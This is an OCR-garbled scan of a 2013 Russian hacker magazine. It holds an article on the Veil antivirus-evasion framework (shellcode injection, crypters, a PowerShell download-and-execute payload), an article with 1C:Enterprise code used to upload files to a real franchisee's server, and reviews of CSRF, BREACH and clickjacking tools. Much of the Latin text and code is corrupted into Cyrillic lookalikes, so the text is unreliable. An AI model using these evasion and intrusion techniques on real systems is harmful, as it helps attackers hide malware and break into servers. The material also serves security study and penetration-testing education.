рауіоасіз/. Любой модуль, помещенный в эту папку (или одну 
из ее дочерних), автоматически подгружается и становится до- 
ступен в основном интерфейсе Ѵеіі, а отдельные папки для каж- 
дого языка внутри данной директории существуют просто ради 
удобства . 

ИНТЕГРАЦИЯ ВНЕШНИХ ИНСТРУМЕНТОВ 

Команда Ѵеіі стремится к тому, чтобы максимально облегчить 
интеграцию любого метода обхода антивирусов в фреймворк. 
Еще на ранних стадиях разработки нас просили сделать воз- 
можной интеграцию внешних инструментов генерации. Благо- 
даря модульной структуре пейлоадных модулей, мы с легко- 
стью удовлетворили эту просьбу, что позволило реализовать 
поддержку инструментов от сторонних авторов (например, 
РЕЗзсгатЫег и Нурегіоп). Посмотреть, как это делается, можно 
в листинге . /тосіиіез/рауіоасіз/паіііѵе/нурегіоп , ру. 

Мы лишь отметим основные моменты: 

* в методе іпіі () свойству Беі-Р.ехііепзіоп нужно при- 

своить значение ехе (строка 26); 

* следует инициализировать обязательную опцию огі§іпаі_ 
ехе (строка 29) примерно таким образом: 

зеІ-Е. геяиіпесІ_ор1:іоп5 = {"огі§іпа1_ехе" : «- 1 

"имя ехе-файла, пропускаемого через Нурегіоп"]} 

* внешние инструменты нужно поместить в ./ѣооіз/, а код 
для их вызова должен быть примерно таким, как в строке 43 
(...сысІ=ѵеі1 . ѴЕІІ__РАТН+"і:ооІ5/Ііурегіоп/ ".,.); 




Первым поддерживаемым в Ѵеіі языком стал РуШоп, Сперва мы изучали методы 
инъекции шелл-кода в память с помощью Руііюп, чтобы выявить среди них наи- 
более надежные. С тех пор мы исследовали и другие языки, пытаясь заложить 
фундамент для их использования. 

Наша цель — позволить пользователям расширять фреймворк под свои 
нужды и, в перспективе, использовать его как базис для своих собственных 
пейлоадов. Ниже представлена лишь малая часть нагрузок, которые способен 
генерировать Ѵеіі. 

РѴТНОЫ 

• РІа^Іп]ѳсііоп — этот пейлоад не использует обфускацию шелл-кода. 

При просмотре исходного кода можно видеть шелл -код, который будет 
внедрен пейлоадом в память для последующего выполнения. 

• Вазѳ64 — получает от Ѵеіі шелл-код, преобразует его к Вазе64 и помещает 
его в исполняемый файл. В среде выполнения шелл-код декодируется, 
внедряется в память и выполняется. 

• І_еИег ЗиЬзіііиііоп — получает от Ѵеіі шелл -код и заменяет его символы 
другими, делая его невалидным. При выполнении пейлоада символы не- 
валидного кода заменяются символами оригинала, шелл-код внедряется 
и выполняется в памяти. 

° АРСЕпсгурІеб — сгенерированный Ѵеіі шелл -код шифруется АВС4 (АІІедесІ 
ВС4) со случайным ключом, а затем преобразуется в Вазе64. При выпол- 
нении пейлоада шел л -код декодируется из Вазе64, расшифровывается 
с помощью хранящегося в исполняемом файле ключа, внедряется в память 
и выполняется. 

• МеіегНТТР[з]СопіаіпесІ — включает теіегргеіег.сІІІ в файл Руійоп и внедря- 
ет его, что позволяет обойтись без его скачивания из Сети. 

С 

с ѴігІиаІАІ!ос/ѴоісІ Роіпіег — реализация на Си техники РІаІІ^есІіоп. 

С# 

• ѴИиаІАІІос — реализация на С# техники РІаіІп]ѳсІіоп. 

• Ь645иЬѴігі:иаШіос — метод инъекции, в котором для обфускации шелл- 
кода используются кодирование Вазе64 и рандомизированный подстано- 
вочный шифр. 

РОЖЕП8НЕІ.І. 

• ѴИиаІАІІос — реализация на РоѵѵегЗйеІІ техники РІа4Іп]есііоп. 

РзехесѴ НиаІАІІос — строит файл ресурсов Меіазріоіі для удаленного вы- 
полнения ѴіііиаІАІІос на нескольких машинах с помощью утилиты РзЕхес. 

• Ооѵѵпіс ао /ігіиаіА іос — создает файл пейлоада для размещения на веб- 
сервере с указанным ІР-адресом. РоѵѵегЗМеіІ-пейлоад соединится с указан- 
ным веб-сервером, скачаете него пейлоад и выполнит его в памяти. 



• сгенерированный бинарный код будет содержаться в воз- 
вращаемом значении РауІоабСосІе. 




\ѵ\ѵ\ѵ 

Адрес репозитория Ѵеіі: 

д Щи и Ь, со гп/ѵе іі-еѵазіоп/ 

Ѵеіі 



КРИПТОРЫ 

На данный момент единственный доступный в Ѵеіі криптор 
предназначен для пейлоадов на РуНтоп. Он появился, когда мы 
задались вопросом, как далеко мы сможем зайти с обфускаци- 
ей кода на РуІІіоп. Существуют АЕЗ, ЭЕЗ и другие прекрасные 
стандарты шифрования, но дешифрующие их куски кода оста- 
ются почти одинаковыми во всех генерируемых файлах. Как мы 
можем максимально рандомизировать файл пейлоада? 

Воспользовавшись идеями превосходного крипто- 
ра Нурегіоп РЕсгуріег, сделанного ребятами из пиіізесигііу 
( пиіізесигііѵ .пеі). мы решили зашифровать код пейлоада це- 
ликом, используя АЕЗ-шифрование со случайным ключом. 
Поскольку это Руібоп, а не, допустим, Си, нам пригодился АЕЗ- 
режим утилиты русгуріо, позволяющий шифровать код цели- 
ком, Вызвав Руійоп-функцию ехес( ), мы можем выполнить сра- 
зу весь файл, предварительно динамически дешифровав его. 

Однако и после первоначальной АЕЗ-обфускации в полу- 
чившемся коде даже при беглом просмотре обнаруживается 
немало повторяющихся фрагментов. Мы решили эту проблему, 
преобразовав код к Вазе64 и завернув результат в еще один 
вызов ехес(), чтобы как можно больше затруднить его чтение. 
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Рис. 6. Зашифрованный с помощью АЕЗ и Ваве64 код пейлоада 



Результат представляет собой единственную инструкцию ехес(), вызывающую пере- 
именованный метод Ьазе64.Ь64сіесосІе(). 

Этот код прекрасно работает в обычном РуЦіоп-файле, но при попытке запаковать 
его в ЕХЕ-файл с помощью руіпБ'СаІІег или ру2ехе возникают проблемы. Поскольку 
мы динамически дешифруем целый файл во время выполнения, руіпз'ЬаІІег не мо- 
жет догадаться заранее, какие библиотеки (например, АЕ5 -библиотека русгурііо) нуж- 
ны для файла. Наше решение заключается в том, чтобы удалить все директивы импор- 
та из шифруемого файла, перемешать их и поместить в начало уже зашифрованного 
файла. 

У нас получается набор рандомизированных ітрогі-директив, за которыми следует 
одна-единственная команда ехес ( ) , выполняющая преобразованную в Вазе64 и шиф- 
рованную АЕ5-алгоритмом (со случайным ключом) текстовую строку, в которой содер- 
жится наш первоначальный код пейлоада. Таким образом, всякий раз при генерации 
мы получаем новый код, даже для одного и того же исходника (из кода, представлен- 
ного на рис. 5, мы получаем представленный на рис. 6). 

Код криптора содержится в ./тосІиІез/сотітіоп/сгурТегз.ру и может использо- 
ваться всеми РуМіоп-пейлоадами ѴеіІ. Чтобы включить его, надо перед генераци- 
ей пейлоада установить в меню для опции и5е_ру!іегіоп значение У. Независимая 
от фреймворка версия криптора находится в ./ѣооІз/руЬегіоп.ру. Она принимает 
на вход любой (ну, почти) файл на РуІИоп и выдает его зашифрованную версию. Мы 
надеемся и дальше изобретать новые «крипторы» по мере появления в ѴеіІ поддерж- 
ки новых языков. 

ЗАКЛЮЧЕНИЕ 

Постоянные проблемы с антивирусами привели нас к созданию полноценного и по- 
стоянно расширяющегося фреймворка ѴеіІ, который уже сейчас поддерживает семь 
языков программирования и в который мы планируем включать все новые и новые тех- 
нологии по мере их появления на свет. 

С точки зрения этики мы склонны рассматривать появление ѴеіІ и сопутствующих 
технологий в позитивном свете, и на то есть несколько причин. Во-первых, сообще- 
ство пентестеров как минимум на пять лет отстает от профессиональных создате- 
лей вредоносного ПО в вопросах шифрования и обфускации; нам еще очень далеко 
до эксплуатации 0-с!ау-уязвимостей в антивирусах. Во-вторых, мы работаем на благо 
общества. Если уж мы, поначалу обладавшие только поверхностным знанием РуІМоп 
и фреймворка Меіазріоіі;, смогли собрать и выпустить первую версию ѴеіІ примерно 
за шесть месяцев, то можно быть уверенным, что и другие за это же время могли раз- 
работать свои методы (и наверняка это сделали) для достижения тех же целей. Сокры- 
тие этих методов не поможет защитить общество от серьезных киберпреступников, 
которые по изощренности методов уже обогнали ѴеіІ на световые годы; все, чего мы 
этим достигнем, — оставим всех остальных в неведении относительно методов, с по- 
мощью которых можно обойти инструменты, используемые нами для защиты инфор- 
мации. 

А производителям антивирусов следует поторопиться с переходом на более об- 
ширные поведенческие эвристики обнаружения. И мы искренне надеемся, что наша 
деятельность по популяризации описанных методов заставит их сделать это как 
можно скорее. ^ 



ѴОАУ 

Когда-то ѴеіІ начал свое существование в виде про- 
стого скрипта, который был способен генерировать 
всего несколько пейлоадов на РуІИоп. На данный мо- 
мент его репертуар включает разнообразные методы 
генерации пейлоадов на РуІІюп, Си, С#, РоѵѵегЗІіеІІ 
и в нативном коде. Пятнадцатого числа каждого ме- 
сяца, начиная с сентября, мы будем выпускать релиз 
с поддержкой по меньшей мере одного нового языка 
либо метода в честь #ѴЭау, нашего «дня победы» 
над антивирусами. Помимо этого, у нас скопилась 
обширная база публичных и частных исследова- 
ний, результаты которых мы планируем регулярно 
обнародовать; крупнейшие релизы будут приурочены 
к датам конференций ЗИплооСоп (середина февраля) 
и ВЗісІез / ЭЕР СОЫ (середина — конец июля). 




Для инъекции шелл-кода в память ѴеіІ задействует 
два основных метода. Первый заключается в ис- 
пользовании нескольких АРІ-вызовов с помощью 
ѴігЕиаІАНос. Второй метод — преобразование 
к ѵоісі -у казате л ю . 

Использующий ѴігЬиаІАПос метод на данный 
момент самый надежный способ инъекции 
шелл-кода в память с его дальнейшим выпол- 
нением. Последовательность вызовов, позволя- 
ющая выполнить код пейлоада, выглядит таким 
образом: 

• ѴігІиаШІос — выделяет область памяти, рав- 
ную по объему нашему шелл-коду, и «помеча- 
ет» ее как исполняемую. Выделение памяти 
этим методом гарантирует, что она будет ис- 
полняемой и не будет замечена механизмом 
ОЕР (Оаіа Ехесиііоп Ргеѵепііоп), если только 

в нем не выставлен максимально высокий 
уровень защиты; 

• ШІМоѵеМѳтогу — копирует шелл-код в вы- 
деленную вызовом ѴігѣиаІАІХос область 
исполняемой памяти; 

*> СгеаіеТИгеасІ — создает на атакуемой маши- 
не поток, в котором выполняется шелл -код, 
внедренный в память; 

• ѴіаііРог5іпдІеОЬ}ес1: — ждет, пока поток 
не завершит выполнение кода. 

Преобразование к ѵоісі-указателю — еще один 
широко распространенный и подробно задо- 
кументированный метод инъекции и выполнения 
шелл-кода. Чтобы было понятней, как он работает, 
рассмотрим следующий код: 

ипзікпесі сііаг Ьи-р-Рег П= ; 

іпі: таіп(ѵоісП { ((ѵоісі С*) ОІЬи-р-РегЮ ; } 

В этом примере адрес массива ЬиТТег используется 
в качестве указателя на функцию, выполняющую 
шелл-код, который хранится в этом массиве. 

Хотя это, вероятно, уже давно самый популярный 
способ инъекции шелл-кода, у него есть недостаток: 
память, в которую попадает шелл-код, не всег- 
да оказывается исполняемой (и, скорее всего, 
не будет таковой ) . Поэтому такой способ внедрения 
прекрасно работает на ХР и предыдущих версиях 
ѴѴіпРоѵѵз, но начатая вѴѴіпсІоѵѵз Ѵізіа интеграция ОЕР 
существенно ограничивает его эффективность, 
а вероятность вызвать ошибку доступа становится 
гораздо выше. 





Если тебе есть что сказать, ты можешь войти в команду любимого журнала 





ІІ ■ ■ Г |1 1] 1 


І'ІІ П Шіл \ П и 


1 іі Н I III ІІ м 









Взлом 



ХАКЕР 11/178/2013 



9 ° 






Проникаем на сервер франчайзи, используя 
встроенные механизмы языка «іС: Предприятие» 



Один из ІТ-трендов этого сезона — предоставление услуг типа «ІС в облаке» 
или «онлайн-доступ к демоконфигурациям». У администраторов таких серви- 
сов двойная нагрузка — обеспечить безопасность самого сервера и системы 
«1С:Предприятие». Инструменты для этого, безусловно, есть, но все ли их зна- 
ют и используют? Сегодня ты узнаешь, как это проверить. 





Андрей Капитонов 

сарі1ап@таіІ.гу 



ВВЕДЕНИЕ 

На моей памяти было не так много статей о продуктах фирмы 
«ІС» в разрезе безопасности, последнее упоминание ее в жур- 
нале датируется мартом 2010 года. Я решил напомнить об этом 
корпоративном монстре и рассказать о своем небольшом ре- 
серче. 

ЗНАКОМСТВО С « 1 С:ПРЕДПРИЯТИЕ» 

Система программ «1С:Предприятие 8», разработанная 
на постсоветском пространстве, включает в себя платформу 
и прикладные решения на ее основе для автоматизации дея- 
тельности организаций и частных лиц. Сама платформа не яв- 
ляется программным продуктом для конечного пользователя, 
обычно работают с одним из многих прикладных решений. 
Встретить эту систему можно далеко не только в офисах Газ- 
прома, но и в парикмахерской или фитнес-центре, которые, 
я надеюсь, ты регулярно посещаешь. 



АРХИТЕКТУРА 

За отведенное историей время система «1 С: Предприятие 8.x» 
стала полностью клиент-серверной. Даже если ты будешь ра- 
ботать с базой данных, находящейся на локальном диске, про- 
грамма будет эмулировать вызовы и ответы сервера. 

Удаленная же система, соответственно настроенная, позво- 
ляет работать даже из веб-браузера. При этом основная часть 
кода выполняется на сервере. 

Это открывает новые горизонты как для разработчиков 
и пользователей, так и для ] [-экспертов. С помощью одних 
и тех же команд возможно выполнять код на стороне клиента 
и на стороне сервера. Если имя пользователя и содержимое 
каталогов личного компьютера тебе, возможно, знакомо, на- 
верняка то, что хранится на сервере, тебе гораздо интереснее. 
При удачном раскладе скрипты и команды системы можно вы- 
полнить на стороне сервере, а при доступе к конфигурации 
информационной базы инициировать их запуск при работе 
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с базой у пользователей. По сути, мы имеем полный аналог 
веб-приложения. При его запуске необходимо проводить весь 
комплекс мер по настройке безопасности: ограничивать права 
учетной записи, под которой работает сервер, права доступа 
к каталогам, разграничивать права пользователей. Я уверен, 
что большинство читателей в курсе всех этих аспектов настрой- 
ки. Однако менталитет администраторов 1С коренным образом 
отличается от менталитета администраторов веб-серверов. За- 
частую ради того, чтобы все заработало, приложению присваи- 
вают максимальные привилегии, пользователи работают в базе 
с полным доступом ко всем функциям. «Это, конечно, на пару 
дней, не больше...» -—думаю, многие сейчас улыбнулись. 

Как известно, безопасность учетной системы складывает- 
ся из многих составляющих. Корректная установка, коррект- 
ное разграничение прав пользователей при работе, аудит 
попыток проникновения, аудит попыток некорректных с точки 
зрения учета действий. В основном юзеры с успехом пользу- 
ются правами, которые не должны были получить по логике 
учетной системы. 

ПЕРЕЛОМНЫЙ МОМЕНТ 

С ростом компьютерной грамотности появляются эксплуатации 
уязвимостей типа изменений в конфигурации базы данных. 

Продвинутые пользователи списывают на счет подставных 
контрагентов погрешности округления, разности в курсах ва- 
лют. Эта тема также достойна отдельной статьи. Поэтому мы 
рассмотрим, не вдаваясь в теорию программирования на язы- 
ке 1С, некоторые функции и команды, способные создать ана- 
лог веб-шелла. Многие продавцы 1С предоставляют доступ 
к демобазам через интернет, так что на сладкое мы побродим 
по серверу небольшого, но гордого украинского франчайзи. 

Предвижу справедливое замечание: взломаешь сайт, на- 
пример правительства Зимбабве, — получишь почет и ува- 
жение мирового сообщества. А полезешь в 1С — получишь 
на орехи от сисадмина и от службы безопасности родной 
фирмы. 



Не все так печально, мой друг. Не обязательно надевать чер- 
ную шляпу. Предложи свои услуги в качестве эксперта и будешь 
прославлен в веках. Уверен, в умах многих руководителей зре- 
ет мысль об аудите безопасности торговой системы. И деньги 
за эту работу они готовы выложить не меньшие, чем за иссле- 
дование безопасности сайтов и компьютерных сетей. 

НЕМНОГО КОНФИГУРИРОВАНИЯ 

Для начала обзаведемся инструментом. Хорошие новости: вер- 
сии для обучения программированию можно совершенно бес- 
платно получить на сайте опііпе.іс.ги . Можно загрузить либо 
платформу, либо полную версию для обучения программиро- 
ванию. В нее входят еще и демонстрационные конфигурации 
и документация. 

Рекомендую скачать, знание 1С еще никому не помешало :). 
Кстати, по мнению авторов книги «1С:Предприятие 8.2. Практи- 
ческое пособие разработчика», в 1С не программируют, а кон- 
фигурируют. Так что наконфигурируем небольшую обработку. 
С ее помощью мы сможем исследовать сервер, на котором рас- 
положена база данных. 

В 1С отличный синтаксис-помощник, в нем можно найти 
описание всех функций встроенного языка. Скажу сразу, нас 
интересует раздел «Глобальный контекст». Хочу обратить твое 
внимание на директивы препроцессора &НаСервере, &НаКли- 
енте, которыми начинается описание процедуры или функции. 
Они определяют место выполнения, по умолчанию система 
считает, что код будет исполняться на сервере. Процедуры вы- 
полнят одно и то же действие, но в случае клиент-серверного 
варианта работы выполняются на разных компьютерах. 

&НаСервере 

Процедура псПолучитьКаталогВременныхФайлов( ) 

Результат. = КаталогВременныхФайлов()_; 

КонецПроцедуры 



&НаКлиенте 




ѴѴАІШШС 

Вся информация предо- 
ставлена исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут от- 
ветственности за любой 
возможный вред, при- 
чиненный материалами 
данной статьи. 
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Ваза 1 С открыта в Соодіе СНготе 



Конфигуратор 1С:Предприятие синтаксис- помощник 




Л 





Конфигуратор 1 0: Предприятие Обработка для исследования сервера 



Платформа 1С:Предприятие Обработка для исследования сервера 
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ДЕМОПРОДУКТЫ 

Посмотреть демки 
приложений 
1 С: Предприятия 
можно на сайте 



Процедура псПолучитьКаталогВременныхФайлов( ) 

Результат = КаталогВременныхФайлов( ) ; 
КонецПроцедуры 



“ 

I I ... ГГ II. — - іи . 







і т В * • и 


- &»+*■■■ 


і ■ и- 




775 ВО 40 
ЗВЭ ѲО 40 








| І ■ Ц-лІейѴ 


* 11’ 









Я уверен, что данный листинг не требует никакого дополни- 
тельного объяснения :}. 

Средствами встроенного языка 1С можно не только рабо- 
тать с файлами, но и запускать приложения, загружать/полу- 
чать файлы по РТР. 

&НаСервере 

Процедура псЗагрУзитьФайл^ 

(АдресВоВременномХранилище, пПолноеИмяФайла) 

ДанныеФайла = ПолучитьИзВременногоХранилища^ 
(АдресВоВременномХранилище) ; 

ВременныйФайл = КаталогВременныхФайлов( ) + 

пПолноеИ мяФайла : 

ДанныеФайла . Записать(ВременныйФайл ) ; 

рфЗагруженныйФайл = В реме н ныйФа йл ; 

КонецПроцедуры 





Чт* и Продукт? 



Каине Ид*чн ре-шеет ітгт продукт ? 



Ы* ІИ 1 РМТ 



Воспользуемся приглашением посмотреть демоверсию 



ІлІзНМеІіѵіюгк - Новый С0М0бъект("Іл!5сгірТ . МеЪуогк" ); 
Результат = м \\"+М 5 НМе*могк.ІІ 5 егОотаіп-ь-' 

" \"+Ы5ІіМе1:могк . ІІБегМате; 



&НаКлиенте 

Процедура кЗагрузитьФайл( Команда) 

ДиалогВыбораФайла = Новый ДиалогВыбораФайла*-! 

(РежимДиалогаВыбораФайла .Открытие) ; 

ДиалогВыбораФайла .Заголовок = "Загрузить 

файл "_х 

ДиалогВыбораФайла .Фильтр = "Файл _+^ 

* • * ) I * . * I ,Т * 



Если Ди алогВыб о р а Фа й л а . Выбрать П Т о гда 

Катало.гЗагружаемогоФайла =_е 

ДиалогВыбораФайла . К ата лог; 

ПолныйПутьКЗа гружаемомуФайлу = *-■ 

ДиалогВыбораФайла .Пол ноеИмяФайл а; 
ФайлНаДиске = Новый «-■ 

Файл (ДиалогВыбораФайла .ПолноеИмяФайла) ; 

АдресВоВременномХранилище = 

Пом естить Файл(АдресВоВременномХранилище . <-■ 

ДиалогВыбораФайла. ПолноеИмяФайла,, , Ложь,*- 1 

УникальныйИдентификатор) ; 

псЗагрузитьФайл (АдресВоВременномХранилище,-*-' 
ФайлНаДиске . Имя ) ; 

КонецЕсли; 

КонецПроцедуры 

Как думаешь, что это? В точку! Мы взяли файл с локаль- 
ного компьютера и загрузили его на сервер. МеШгргеІег 
без Меіазріоіі: :). Не буду перечислять все полезные функции. 
Пример прилагается к статье, а место журнала драгоценно. 

А если вдруг нужны дополнительные возможности — тоже 
не проблема: 



И мы уже узнаем имя пользователя и домен, используя ѴѴЗсгірі 
В итоге мы получаем обработку с нужным нам функциона- 
лом. Проверяем ее на локальном компьютере. 

ѴАММІ! 

Наберем в поиске «франчайзи 1с демо» и получим десятки 
предложений онлайн-демонстрации. Сразу предупрежу, в ре- 
зультате исследования ни один франчайзи не пострадал. Тем 
более что было принято решение оставить в покое отечествен- 
ного производителя. Зайдем к братьям -славянам. И подклю- 
чимся к их базе. 

Как видно, с помощью нашей несложной обработки можно 
не только посмотреть, что и как хранится на сервере сопре- 
дельного государства, но и отправить админам короткое по- 
слание. Файл успешно перекочевал на сервер. Через 30 секунд 
файл оказывается в выбранном каталоге. Выгрузить/загрузить/ 
запустить, оказывается, можно все, что угодно. Главное — во- 
время взять себя в руки. 

ЗАКЛЮЧЕНИЕ 

У каждой истории должен быть хеппи-энд. Администраторы 
сервера получили письмо со скриншотами и достаточно опе- 
ративно устранили проблему. Я получил возможность написать 
эту статью. Тебя ждут впереди увлекательные исследования. 
Если тема покажется интересной, то наш любимый журнал по- 
полнится новыми продолжениями этой истории. 

Пиши, и, возможно, мы вместе пощупаем за мошну саму 
фирму «1С». С учетом действующего законодательства РФ, 
безусловно. Вместо домашнего задания — отрывок из спи- 
ска сайтов, предоставляющих демодоступ к конфигурации 
« 1 С : П редп риятие» . ЗГ 



РедактнроБЭние информационной базы 
Укажите строку адреса информационной база: 



ід!І 



У А 34.28.68.56/Вазе 



Выберите Еариэнт использования прокси: 

® Не использовать прокси 

О Использовать автоматическое определение прокси 
О Указать настройки про кси 
Адрес: 

Пользователь: 

Выберите способ аутентификации пользователя веб-сервера: 
>) Выбирать автоматически 
О Запрэши еать имя и пароль 



< Назад 





Порт: 






Пароль: 
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Подключиться можно в режиме тонкого клиента 



Информация о базе данных на фоне содержимого диска О: 
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РЕКОМЕНДОВАННАЯ ЦЕНА 200 РУБЛЕЙ 
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Внимание! Информация представлена исключи- 
тельно с целью ознакомления! Ии авторы, ни редак- 
ция за твои действия ответственности не несут! 





Дмитрий «Оіді» Евдокимов, 
Оідііаі Зесигііу 
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Авторы: Магіо Ѵііаз, 
сгОІтл 

ЦШ: ІіЦрз://аіШиЬ. 

сош/аоіізглего/ 

аоіізтѳго 

Система: ѴѴіпОоѵѵз, 
І_іпііх, *В$0,03Х 




СІіскіаскіпд ТооІ 

■*' с -т>: ~ Й.Ё 








Автор: АІізап Міг 

ІІВІ_: ИИр5://сосІе. 

аоодіе.еот/р/ріпаіа- 

сзгНооІ 

Система: 

ѴѴіпОоѵѵз/ипих 





Автор: Г4еа! Наггіз 

ІІВІ.: ІіКр5://дМиЬ. 

сот/пеаІМаггіз/ 

ВВЕАСН 

Система: ѴѴІпсІоѵѵз 




АГРЕГАЦИЯ РЕЗУЛЬТАТОВ 

ОоЦзтего — это фреймворк с открытым ис- 
ходным кодом для тестирования безопасности. 
На текущий момент проект нацелен на веб- 
безопасность, но он может быть легко расширен 
для проведения других видов сканирования. Осо- 
бенности данного фреймворка: 

• кросс-платформенность (ѴѴІпсІоѵѵз, 1_іпих, 
*ВЗй, 05 X); 

• хорошая производительность; 

• простота использования; 

• плагин ная архитектура; 

• интеграция с СѴѴЕ, СѴЕ и 0ѴѴА5Р; 

• написан на чистом РуНпоп; 

• предназначен для развертывания на класте- 
ре машин. 

Другими словами, данный инструмент подхо- 
дит для проведения различных видов сканирова- 
ния цели и агрегации, анализа результатов, пре- 
доставленных различными инструментами, и все 
это в одном месте. Результат можно выводить 
в консоль и файл (форматы геЗігисІигесІ, НТМІ_). 

Для его работы необходимо лишь наличие 
РуНіоп-интерпретатора. Инструмент устанавли- 
вается из Оіі и легко запускается: 

руІіИоп еоіізтего.ру <1;аг§еі;> 

или 

ру-Ціоп ^оіізтего.ру зсап <1;аг§е1:> <-• 

-с!Ь сІаІіаЬазе.сІЬ -по 

для сохранения полученных результатов работы 
в базу данных. 

Разработчики планируют прикрутить под- 
держку здітар, 2АР, Меіазріоф ЗИосІап. 



РОС ДЛЯ С5 В Р- АТАК 

Нет платной версии Вигр и ты не можешь на лету 
генерировать РоС для СЗВР-атак? Не беда! Ріпаіа- 
сзгМооІ генерирует НТМ!_ для ргооі 1 о? сопсерСа 
СЗИР-атаки по заданному НТТР-запросу. Она ав- 
томатически проверяет, используется (ЗЕТ- или 
РОЗТ-запрос, и генерирует нужную нагрузку. 

При (ЗЕТ-запросе она сгенерит тег с картин- 
кой <ітд ...> со всеми параметрами. При Р05Т- 
запросе будет создана форма с автоматическим 
сабмитом всех данных. 

Утилита состоит их трех файлов: ріпаТа.ру 
(основной файл программы, после запуска он ге- 
нерит НТМІ_), тагкир.ру (вызывается ріпаТа.ру 
для генерации НТМІ_) и СБКРВосІу .ііхі; (содержит 
НТТР, по которому генерить форму). Для уста- 
новки нужно просто извлечь все файлы в какую- 
нибудь папку и проверить имеющуюся версию 
РуІНоп (требуется версия 2.6 либо 2.7). 

Использование утилиты: делаем запрос в бра- 
узере, перехватываем НТТР-данные через прокси 
(или иным путем), вставляем их в СЗКРВосІу .ТхТ, 
сохраняем и закрываем этот файл. Далее запу- 
скаем в консоли руТНоп ріпаТа.ру и получаем 
сгенеренный НТМІ_для демонстрации СЗВР. 

Если ты вдруг забыл, что такое СЗВР-атака, 
то напоминаю: это аббревиатура от Сгозз Зііе 
Вецивзі: Рогдегу (подделка межсайтовых запро- 
сов). Суть ее заключается в незаметном (запрос 
не должен требовать какого-либо подтвержде- 
ния со стороны пользователя) отправлении за- 
проса на другой сервер (например, на сервер 
платежной системы), с помощью которого осу- 
ществляются определенные действия (скажем, 
перевод денежных средств на другой счет). Для 
проведения данной атаки жертва должна быть 
авторизована на том сервере, на который от- 
правляется запрос. 



ВПЕАСНАТТАСК 

ЗЗІ_ сейчас одна из самых нужных и распростра- 
ненных защит, но и этот протокол не безгрешен. 
Авторы эксплойта ВВЕАСН выпустили программу 
для пентеста, с помощью которой каждый веб- 
мастер может проверить свой сайт на предмет 
слабости НТТР5. 

Напомним, что атака ВВЕАСН (Вгоѵѵзег 
Несоппаіззапсе апб ЕхІіИгайоп ѵіа Асіарііѵе 
Сотргеззіоп о? НуреНех© то есть браузерное зон- 
дирование и эксфильтрация через адаптивную 
компрессию гипертекста) относится к типу атак 
с оракулом, когда по длине шифровки мы можем 
догадаться о ее содержимом. Метод позволяет 
извлекать пароли и другую ценную информа- 
цию из НТТРЗ-трафика, сжатого архиватором 
ОЕРІАТЕ (алгоритм сжатия без потерь, использу- 
ющий комбинацию алгоритма І_277 и алгоритма 
Хаффмана), перед шифрованием. Атакующий 
«тестирует» цель тысячами входных значений, 
которые должны попасть в заархивированный 
и зашифрованный трафик, вместе с секретной 
информацией. 

Перед такой атакой уязвимы все сайты, кото- 
рые используют 35І_/ТІ_3-шифрование с предва- 
рительным сжатием трафика и при этом позволя- 
ют отправлять на сайт пользовательские запросы 
произвольного содержания (например, поиско- 
вые запросы). Также необходимо, чтобы жертву 
можно было заманить на сайт, контролируемый 
атакующим, в тот момент, когда у жертвы открыта 
НТТРЗ-сессия с сайтом, который мы «тестируем». 
Естественно, нужна еще возможность перехва- 
тывать зашифрованный трафик пользователя. 
ВВЕАСН пополнил ряды таких методов взлома 
351-/Т15, как Цюку 13, ВЕА5Т и С РИМЕ. 

Инструмент впервые был представлен 
на ВІаск Наі: І_аз Ѵедаз 2013. 
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Автор: РаиІ 8!опе 

ІІК1.: ЬІ!,Іѵ/1Ьггіс4 

Система: ѴѴіпсІоѵѵе /Ипих / 05 X 



КЛИКАЙ СЮДА 

СІіскіаскіпд !ооІ — это НТМІ_-Ьазесі утилита, которая помогает реализовать различные 
сііс^аскіпд -техники, задав алгоритм действия для пользователя. 

Экран поделен на три рабочие области: левая часть сверху — кнопки управления, слева 
снизу — лог событий и самая большая, правая часть демонстрирует текущую работу. Очень 
удобно. Из кнопок управления мы имеем: 

• Іоасі 1)РИ. — подтягивает ІІВІ во фрейме с заданным адресом, можно указать размер 
фрейма и другие опции; 

• СІіск — обычный клик. Задаешь координаты элемента, по которому надо кликнуть; 

• Еп!ег Тех! — ввод текста. Использует Іаѵа-апплет для ввода текста в нужное поле; 

• Эгад — используется, если нужно выбрать какой-нибудь текст на странице, а также в си- 
туациях, где есть выпадающие меню; 

• Ех!гас! — вытаскивает ссылку, изображение со страницы. 

Инструмент впервые был представлен на Віаск На! Еигоре 2010. Подробнее 
о сііскіаскіпд-техниках ты можешь узнать из презентации { эі!.Іу / с1тод9 < ) автора ІМех! 
Ѳепегаііоп СІіскіаскіпд: Ыеѵѵ а!!аскз адаіпз!1татесІ ѵѵеЬ радез. 




ііагііпд Итар 6*00 { Ыір: //ппар + огді ) 
чтар эсегі герогЕ Гог 172*16*94 Л28 
Ю5І І5 ир (0.000515 ІаГопеу), 

>0ЙТ 5ТАТЕ 5 ЕР VI СЕ ѴЕК5І0М 
<І2/Еср ореп Ореп55Н 0оЬ 

1 ѵдізсап : [341] 0рел5$Н ЫэеЕодЕп Еоса 
| [504] 0реп55Н 55Нѵ2 РоЫіс Кеу АиЕКе 
I [642] Ореп55Н Митріе Кеу Туре АСЕ 
| [688] ОрепЗЗН ІКеЕодІп ЕпѵігоппепЕ V 
| [730] ОрепЗЗН СКэгпеІ Согіе ОТТ Ьу Оп 
1 [781] ОрепЗБН КегЬегоБ ТОТ /АР 5 Токеп 
] [Й39] ОрепЗЗН РАМАиЕЬепгісагіопѵіакЬ 
\ [1853] ОрепБЗН ЗугоЬоІіс Ипк ‘ соокіе 
] [21Ѳ9] 0реп55Н РооЕ Еодіп Тіпіп 

] [2112] ОрепЗЗН Реѵег^е ОМ5 Еоокир Зу 
| [2140] ореп55Н м/ рам улетаете ѵаИсІ 
| [2557] ОрепЗЗН МиІЕІрІе ВиГ^ег Капад 
1 [3456] Ореп55Н ЬиГГег ^аррепс1_5расе( ) 



Автор: Маге Р?ие! 

ЦВІ_: ЬіІІу/ШІХТ 

Система: ѴѴІпсІоѵѵз/ 
1_іпих 





Автор: Оазоп Оіпд 

ІІВІ_: ННрз://ді!І"іиЬ 
сот/сітагі/ііпкесііп 
кіеріо 

Система: 

ОБХ/Упих 





Автор: Пехдоіетз 

ІІВІ.: ИН рБ^/дііІіиЬ. 

сот/ИехдрІетз/ 

зсііет 

Система: 1_іпих 




БАГИ ПРЯМО ИЗ СКАНА 

Любая атака начинается с рекогносцировки 
на местности: определение хостов, использу- 
емые ОС, открытые порты, запущенные на них 
сервисы. Со всем этим прекрасно справляется 
